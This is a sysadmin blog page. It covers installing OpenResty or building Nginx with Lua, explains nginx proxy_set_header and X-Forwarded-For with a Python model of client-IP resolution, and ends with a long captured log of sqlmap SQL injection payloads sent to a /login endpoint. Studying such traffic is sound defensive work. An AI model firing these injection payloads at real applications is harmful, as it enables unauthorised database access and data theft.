kk Blog —— General Fundamentals


date [-d @int|str] [+%s|"+%F %T"]
netstat -ltunp
sar -n DEV 1

Nginx / OpenResty: installing Lua support

Nginx needs the lua-nginx-module module to support Lua. There are two common ways to get it:

Build Nginx from source with lua-nginx-module added at compile time

Use OpenResty: Nginx bundled with a set of modules, with Lua support enabled by default (this is the recommended way)


OpenResty is just an enhanced version of Nginx by means of addon modules anyway. You can take advantage of all the existing goodies in the Nginx world.

OpenResty® is a high-performance web platform based on Nginx and Lua. It bundles a large number of well-designed Lua libraries, third-party modules and most of their dependencies, so that dynamic web applications, web services and dynamic gateways that handle very high concurrency and scale well can be built with little effort.

OpenResty® brings together a set of well-designed Nginx modules (most of them developed by the OpenResty team) and effectively turns Nginx into a powerful general-purpose web application platform. Web developers and systems engineers can use the Lua scripting language to drive the C and Lua modules Nginx supports and quickly build high-performance web systems that handle 10K, or even 1000K and more, concurrent connections on a single machine.

The goal of OpenResty® is to run your web service directly inside the Nginx server, taking full advantage of Nginx's non-blocking I/O model to give consistently high-performance responses not only to HTTP clients but also to remote backends such as MySQL, PostgreSQL, Memcached and Redis.

OpenResty

OpenResty is easy to install. For common Linux distributions OpenResty® provides official pre-built packages: CentOS uses yum, Ubuntu uses apt-get; see https://openresty.org/cn/installation.html for details. The following uses installing OpenResty on CentOS 7 as the example.

Using OpenResty on CentOS 7

Run the following 3 commands in a terminal to install OpenResty under /usr/local/openresty

sudo yum install yum-utils
sudo yum-config-manager --add-repo https://openresty.org/package/centos/openresty.repo
sudo yum install openresty

The Nginx configuration file is at /usr/local/openresty/nginx/conf/nginx.conf (no explicit path is given in the openresty -V output)

Verify

Add the Lua test snippet to /usr/local/nginx/conf/nginx.conf

location /lua {
	default_type 'text/html';
	content_by_lua 'ngx.say("hello world");';
}

Start openresty

openresty

If curl http://localhost/lua prints hello world, Nginx supports Lua

help

[root@localhost ~]# openresty -h
nginx version: openresty/1.21.4.1
Usage: nginx [-?hvVtTq] [-s signal] [-p prefix]
             [-e filename] [-c filename] [-g directives]

Options:
  -?,-h         : this help
  -v            : show version and exit
  -V            : show version and configure options then exit
  -t            : test configuration and exit
  -T            : test configuration, dump it and exit
  -q            : suppress non-error messages during configuration testing
  -s signal     : send signal to a master process: stop, quit, reopen, reload
  -p prefix     : set prefix path (default: /usr/local/openresty/nginx/)
  -e filename   : set error log file (default: logs/error.log)
  -c filename   : set configuration file (default: conf/nginx.conf)
  -g directives : set global directives out of configuration file

Compiling Nginx + Lua

Compiling Nginx needs the tools below. If you are not sure whether they are installed, you can also install them as the errors during the build point them out

yum install -y gcc g++ gcc-c++
yum -y install zlib zlib-devel openssl openssl-devel pcre pcre-devel

Lua support in Nginx depends on LuaJIT-2.0.4.tar.gz, ngx_devel_kit and lua-nginx-module. The build steps are described below (everything is downloaded to /root)

Download and install LuaJIT-2.0.4.tar.gz

wget -c http://luajit.org/download/LuaJIT-2.0.4.tar.gz
tar xzvf LuaJIT-2.0.4.tar.gz
cd LuaJIT-2.0.4
make install PREFIX=/usr/local/luajit

# add the environment variables the lua-nginx-module build needs
export LUAJIT_LIB=/usr/local/luajit/lib
export LUAJIT_INC=/usr/local/luajit/include/luajit-2.0

# download and extract ngx_devel_kit (back in /root so the paths below match)
cd /root
wget https://github.com/simpl/ngx_devel_kit/archive/v0.3.0.tar.gz
tar -xzvf v0.3.0.tar.gz

# download and extract lua-nginx-module
wget https://github.com/openresty/lua-nginx-module/archive/v0.10.8.tar.gz
tar -xzvf v0.10.8.tar.gz

# download and install nginx-1.10.3.tar.gz
wget http://nginx.org/download/nginx-1.10.3.tar.gz
tar -xzvf nginx-1.10.3.tar.gz
cd nginx-1.10.3

# note: use the actual extracted paths of ngx_devel_kit and lua-nginx-module
./configure --add-module=/root/ngx_devel_kit-0.3.0 --add-module=/root/lua-nginx-module-0.10.8

make -j2
make install

Nginx is now installed under /usr/local/nginx, and its configuration file is /usr/local/nginx/conf/nginx.conf

Verify

Make nginx available as a command: ln -s /usr/local/nginx/sbin/nginx /usr/bin/nginx

Add the Lua test snippet to /usr/local/nginx/conf/nginx.conf

location /lua {
	default_type 'text/html';
	content_by_lua 'ngx.say("hello world");';
}

Start openresty

openresty

If curl http://localhost/lua prints hello world, Nginx supports Lua

The Nginx build steps above come from http://www.cnblogs.com/aoeiuv/p/6856056.html. Building Nginx yourself is a bit more work than using OpenResty, but it is not hard; choose whichever you prefer.

http://qtdebug.com/mac-nginx-lua/

A quick guide to nginx's proxy_set_header

https://www.cnblogs.com/eastegg/p/16650586.html

Client address (the address making the request): 192.168.1.1

nginx server address: 192.168.1.2

Backend server address: 192.168.1.3

proxy_set_header sets request headers so that the backend server can obtain the real values above.

1. X-Real-IP

This is the client's real IP. If it is set to $remote_addr, the backend server can obtain the client's real IP, which in this example is 192.168.1.1

2. Host

proxy_set_header can set Host to $proxy_host, $host or $http_host.

Setting Host to $proxy_host uses the host from proxy_pass in nginx.conf, i.e. 192.168.1.3, the backend server's IP address.

$http_host is not a fixed variable; it is actually the result of the $http_HEADER wildcard.

In $http_HEADER, HEADER is a wildcard that matches a header of the request: for example $http_content_type is the value of the content-type request header, and likewise $http_host is the value of the host request header.

$host is an internal variable of the core module.

When the request has no Host header, or the header is empty, $host equals server_name

If the request has a Host header, $host is the Host value with the port removed; for example, if Host is www.example.com, $host is www.example.com

Variable     Port shown?                                    Value
host         no: when the value is a:b only a is shown      shown when "Host: value" is present
http_host    yes, the header is passed through as sent      shown whenever "Host: value" has a value
proxy_host   default port 80 is hidden, other ports shown   shown when "Host: value" is present

References: the difference between nginx $host and $http_host - UCloud community
https://zhuanlan.zhihu.com/p/115731015
Differences between $http_host, $host and $proxy_host in Nginx - hopeless-dream - cnblogs

3. X-Forwarded-For

This header can be set to $proxy_add_x_forwarded_for or $remote_addr. With only a single proxy forwarding the request the two appear to behave the same: both show the client's original IP.

For example, user A with IP 192.168.1.1 requests an application that passes through two nginx forwards. The first nginx (192.168.1.2) is configured as follows:

proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

At this point the X-Forwarded-For part of $proxy_add_x_forwarded_for is empty, so only $remote_addr is left, and $remote_addr is the user's IP; X-Forwarded-For therefore becomes the user's IP: 192.168.1.1.

The second nginx is configured as follows:

proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

Now the X-Forwarded-For part of $proxy_add_x_forwarded_for contains the user's real IP and the $remote_addr part is the previous nginx's IP, so X-Forwarded-For becomes "user's real IP, first nginx's IP", i.e. "192.168.1.1, 192.168.1.2"

So it is still recommended to set X-Forwarded-For to $proxy_add_x_forwarded_for.

Reference: https://cloud.tencent.com/developer/article/1899717
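The Host and X-Forwarded-For sections above can be checked by modelling the variables in code. The script below is an added example, not code from the original post or from nginx: it reproduces how $host, $http_host, $proxy_host and $proxy_add_x_forwarded_for are derived, walks the post's two-hop chain (client 192.168.1.1 -> nginx 192.168.1.2 -> a second nginx, assumed here to be 192.168.1.3 -> backend), and shows the backend-side rule a practitioner needs once the chain exists: the client address is the right-most X-Forwarded-For entry that is not one of your own proxies, because the left-most entry is whatever the client chose to send. The function names, the trusted-proxy list and the forged header value are assumptions of this example.

```python
"""Model of the nginx variables discussed above plus a backend that consumes
them. Added example; not code from the original post or from nginx. The
second proxy address 192.168.1.3 and TRUSTED_PROXIES are assumptions."""
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional
from urllib.parse import urlsplit


def nginx_host(headers: Dict[str, str], server_name: str) -> str:
    """$host: the Host header with any port removed; when the header is
    missing or empty, server_name is used instead."""
    raw = headers.get("Host", "").strip()
    if not raw:
        return server_name
    # urlsplit handles "name:port" and "[v6]:port" and lowercases like nginx
    return urlsplit("//" + raw).hostname or server_name


def http_host(headers: Dict[str, str]) -> Optional[str]:
    """$http_host: the Host header exactly as the client sent it (port
    included), or None when the request carried no Host header."""
    return headers.get("Host")


def proxy_host(proxy_pass: str) -> str:
    """$proxy_host: host[:port] taken from proxy_pass. Port 80 is hidden,
    any other explicit port is shown (modelled for http:// upstreams)."""
    u = urlsplit(proxy_pass)
    if u.port in (None, 80):
        return u.hostname
    return f"{u.hostname}:{u.port}"


def proxy_add_x_forwarded_for(headers: Dict[str, str], remote_addr: str) -> str:
    """$proxy_add_x_forwarded_for: incoming X-Forwarded-For with
    ", $remote_addr" appended; just $remote_addr when the header is absent."""
    incoming = headers.get("X-Forwarded-For")
    return f"{incoming}, {remote_addr}" if incoming else remote_addr


def nginx_hop(headers: Dict[str, str], remote_addr: str) -> Dict[str, str]:
    """One nginx hop configured with
        proxy_set_header X-Real-IP       $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    Returns the headers the next hop receives."""
    out = dict(headers)
    out["X-Real-IP"] = remote_addr
    out["X-Forwarded-For"] = proxy_add_x_forwarded_for(headers, remote_addr)
    return out


def client_ip(xff: Optional[str], remote_addr: str, trusted: List[str]) -> str:
    """Backend side: walk the chain from the right, skipping addresses that
    belong to our own proxies; the first address that is not ours is the
    client. Never take the left-most entry: the client controls it."""
    nets = [ip_network(n) for n in trusted]
    chain = [h.strip() for h in (xff or "").split(",") if h.strip()]
    chain.append(remote_addr)            # the peer that connected to us
    for hop in reversed(chain):
        try:
            addr = ip_address(hop)
        except ValueError:
            break                        # malformed entry: trust nothing left of it
        if not any(addr in net for net in nets):
            return hop
    return remote_addr                   # every entry was ours (or malformed)


# The post's topology; the second nginx address is assumed.
TRUSTED_PROXIES = ["192.168.1.2/32", "192.168.1.3/32"]


def two_hop_chain(client_headers: Dict[str, str]) -> Dict[str, str]:
    """Headers as they reach the backend after nginx 192.168.1.2 and the
    assumed second nginx 192.168.1.3 have both applied nginx_hop()."""
    after_first = nginx_hop(client_headers, "192.168.1.1")   # client connects to #1
    return nginx_hop(after_first, "192.168.1.2")            # #1 connects to #2


if __name__ == "__main__":
    honest = two_hop_chain({"Host": "www.example.com:8080"})
    forged = two_hop_chain({"Host": "www.example.com",
                            "X-Forwarded-For": "10.0.0.9"})  # constructed, client-supplied
    for h in (honest, forged):
        print(h["X-Forwarded-For"], "->",
              client_ip(h["X-Forwarded-For"], "192.168.1.3", TRUSTED_PROXIES))
```

Running it prints the honest chain "192.168.1.1, 192.168.1.2" and the forged chain "10.0.0.9, 192.168.1.1, 192.168.1.2"; client_ip() resolves both to 192.168.1.1, which is what X-Real-IP on the first hop would also have given, while a backend that reads the first entry of the forged chain would log 10.0.0.9.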

Capturing sqlmap traffic

Capture with tcpdump, export the stream as text from Wireshark and URL-decode it, and you get sqlmap's injection statements

GET /login?username=abc&password=123 HTTP/1.1 
GET /login?username=abc&password=123 HTTP/1.1 
GET /login?username=2795&password=123 HTTP/1.1 
GET /login?username=abc((),",),.'&password=123 HTTP/1.1 
GET /login?username=abc'VOhiEk<'">ULNwju&password=123 HTTP/1.1 
GET /login?username=abc') AND 2781=9607 AND ('Rnuk'='Rnuk&password=123 HTTP/1.1 
GET /login?username=abc' AND 2247=4788 AND 'ddJs'='ddJs&password=123 HTTP/1.1 
GET /login?username=abc) AND 6875=6686 AND (3318=3318&password=123 HTTP/1.1 
GET /login?username=abc AND 3033=6740&password=123 HTTP/1.1 
GET /login?username=abc AND 9516=5869-- dooX&password=123 HTTP/1.1 
GET /login?username=(SELECT (CASE WHEN (2922=6853) THEN 'abc' ELSE (SELECT 6853 UNION SELECT 6863) END))&password=123 HTTP/1.1 
GET /login?username=abc') AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71)) AND ('WLxo'='WLxo&password=123 HTTP/1.1 
GET /login?username=abc' AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71)) AND 'EnIq'='EnIq&password=123 HTTP/1.1 
GET /login?username=abc) AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71)) AND (1539=1539&password=123 HTTP/1.1 
GET /login?username=abc AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71))&password=123 HTTP/1.1 
GET /login?username=abc AND EXTRACTVALUE(9018,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(9018=9018,1))),0x717a6b6a71))-- Zpqd&password=123 HTTP/1.1 
GET /login?username=abc') AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND ('yoJQ'='yoJQ&password=123 HTTP/1.1 
GET /login?username=abc' AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND 'rRrm'='rRrm&password=123 HTTP/1.1 
GET /login?username=abc) AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND (9921=9921&password=123 HTTP/1.1 
GET /login?username=abc AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC)&password=123 HTTP/1.1 
GET /login?username=abc AND 3119=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (3119=3119) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC)-- MRHt&password=123 HTTP/1.1 
GET /login?username=abc') AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND ('uWsT'='uWsT&password=123 HTTP/1.1 
GET /login?username=abc' AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND 'autW'='autW&password=123 HTTP/1.1 
GET /login?username=abc) AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND (6576=6576&password=123 HTTP/1.1 
GET /login?username=abc AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)))&password=123 HTTP/1.1 
GET /login?username=abc AND 6208 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (6208=6208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)))-- bXtg&password=123 HTTP/1.1 
GET /login?username=abc') AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND ('VlYe'='VlYe&password=123 HTTP/1.1 
GET /login?username=abc' AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'XgIT'='XgIT&password=123 HTTP/1.1 
GET /login?username=abc) AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND (6471=6471&password=123 HTTP/1.1 
GET /login?username=abc AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)&password=123 HTTP/1.1 
GET /login?username=abc AND 6846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (6846=6846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)-- IRUY&password=123 HTTP/1.1 
GET /login?username=(SELECT CONCAT(CONCAT('qvjkq',(CASE WHEN (6090=6090) THEN '1' ELSE '0' END)),'qzkjq'))&password=123 HTTP/1.1 
GET /login?username=abc');SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc';SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc);SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc;SELECT PG_SLEEP(5)--&password=123 HTTP/1.1 
GET /login?username=abc');WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc';WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc);WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc;WAITFOR DELAY '0:0:5'--&password=123 HTTP/1.1 
GET /login?username=abc');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(83)||CHR(118)||CHR(118),5) FROM DUAL--&password=123 HTTP/1.1 
GET /login?username=abc') AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg) AND ('BoHR'='BoHR&password=123 HTTP/1.1 
GET /login?username=abc' AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg) AND 'IFHW'='IFHW&password=123 HTTP/1.1 
GET /login?username=abc) AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg) AND (2757=2757&password=123 HTTP/1.1 
GET /login?username=abc AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg)&password=123 HTTP/1.1 
GET /login?username=abc AND (SELECT 5242 FROM (SELECT(SLEEP(5)))uNyg)-- zwZm&password=123 HTTP/1.1 
GET /login?username=abc') AND 8170=(SELECT 8170 FROM PG_SLEEP(5)) AND ('CuGS'='CuGS&password=123 HTTP/1.1 
GET /login?username=abc' AND 8170=(SELECT 8170 FROM PG_SLEEP(5)) AND 'WmPH'='WmPH&password=123 HTTP/1.1 
GET /login?username=abc) AND 8170=(SELECT 8170 FROM PG_SLEEP(5)) AND (6554=6554&password=123 HTTP/1.1 
GET /login?username=abc AND 8170=(SELECT 8170 FROM PG_SLEEP(5))&password=123 HTTP/1.1 
GET /login?username=abc AND 8170=(SELECT 8170 FROM PG_SLEEP(5))-- OgwJ&password=123 HTTP/1.1 
GET /login?username=abc') WAITFOR DELAY '0:0:5' AND ('jCFc'='jCFc&password=123 HTTP/1.1 
GET /login?username=abc' WAITFOR DELAY '0:0:5' AND 'FpFX'='FpFX&password=123 HTTP/1.1 
GET /login?username=abc) WAITFOR DELAY '0:0:5' AND (7644=7644&password=123 HTTP/1.1 
GET /login?username=abc WAITFOR DELAY '0:0:5'&password=123 HTTP/1.1 
GET /login?username=abc WAITFOR DELAY '0:0:5'-- sPYO&password=123 HTTP/1.1 
GET /login?username=abc') AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5) AND ('BmJW'='BmJW&password=123 HTTP/1.1 
GET /login?username=abc' AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5) AND 'svZV'='svZV&password=123 HTTP/1.1 
GET /login?username=abc) AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5) AND (8259=8259&password=123 HTTP/1.1 
GET /login?username=abc AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5)&password=123 HTTP/1.1 
GET /login?username=abc AND 4938=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101)||CHR(86)||CHR(112)||CHR(86),5)-- tkiR&password=123 HTTP/1.1 
GET /login?username=abc') ORDER BY 1-- xBKA&password=123 HTTP/1.1 
GET /login?username=abc') ORDER BY 2552-- QaqN&password=123 HTTP/1.1 
GET /login?username=abc' ORDER BY 1-- CXec&password=123 HTTP/1.1 
GET /login?username=abc' ORDER BY 5386-- OCdf&password=123 HTTP/1.1 
GET /login?username=abc) ORDER BY 1-- qihI&password=123 HTTP/1.1 
GET /login?username=abc) ORDER BY 8561-- muFp&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 1-- zHug&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 6155-- jbRk&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 1-- JNHc&password=123 HTTP/1.1 
GET /login?username=abc ORDER BY 7301-- lLsH&password=123 HTTP/1.1 
GET /login?username=abc&password=1760 HTTP/1.1 
GET /login?username=abc&password=123).),"')((. HTTP/1.1 
GET /login?username=abc&password=123'JHsedc<'">YLcugw HTTP/1.1 
GET /login?username=abc&password=123) AND 9079=5601 AND (1335=1335 HTTP/1.1 
GET /login?username=abc&password=123 AND 1857=7867 HTTP/1.1 
GET /login?username=abc&password=123 AND 8511=5177-- pZVc HTTP/1.1 
GET /login?username=abc&password=123') AND 7997=8676 AND ('HkRV'='HkRV HTTP/1.1 
GET /login?username=abc&password=123' AND 1648=3770 AND 'QrJb'='QrJb HTTP/1.1 
GET /login?username=abc&password=(SELECT (CASE WHEN (5600=9308) THEN 123 ELSE (SELECT 9308 UNION SELECT 4757) END)) HTTP/1.1 
GET /login?username=abc&password=123) AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) AND (8074=8074 HTTP/1.1 
GET /login?username=abc&password=123 AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) HTTP/1.1 
GET /login?username=abc&password=123 AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71))-- mRSf HTTP/1.1 
GET /login?username=abc&password=123') AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) AND ('hMli'='hMli HTTP/1.1 
GET /login?username=abc&password=123' AND EXTRACTVALUE(7970,CONCAT(0x5c,0x71766a6b71,(SELECT (ELT(7970=7970,1))),0x717a6b6a71)) AND 'PpkB'='PpkB HTTP/1.1 
GET /login?username=abc&password=123) AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND (7589=7589 HTTP/1.1 
GET /login?username=abc&password=123 AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) HTTP/1.1 
GET /login?username=abc&password=123 AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC)-- AWtz HTTP/1.1 
GET /login?username=abc&password=123') AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND ('Kndh'='Kndh HTTP/1.1 
GET /login?username=abc&password=123' AND 9196=CAST((CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (9196=9196) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)) AS NUMERIC) AND 'ynpj'='ynpj HTTP/1.1 
GET /login?username=abc&password=123) AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND (4254=4254 HTTP/1.1 
GET /login?username=abc&password=123 AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) HTTP/1.1 
GET /login?username=abc&password=123 AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)))-- Cppc HTTP/1.1 
GET /login?username=abc&password=123') AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND ('jrda'='jrda HTTP/1.1 
GET /login?username=abc&password=123' AND 8876 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (8876=8876) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113))) AND 'Hxec'='Hxec HTTP/1.1 
GET /login?username=abc&password=123) AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND (3323=3323 HTTP/1.1 
GET /login?username=abc&password=123 AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) HTTP/1.1 
GET /login?username=abc&password=123 AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL)-- ipPa HTTP/1.1 
GET /login?username=abc&password=123') AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND ('LKje'='LKje HTTP/1.1 
GET /login?username=abc&password=123' AND 8533=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (8533=8533) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(107)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'qtMI'='qtMI HTTP/1.1 
GET /login?username=abc&password=(SELECT CONCAT(CONCAT('qvjkq',(CASE WHEN (8658=8658) THEN '1' ELSE '0' END)),'qzkjq')) HTTP/1.1 
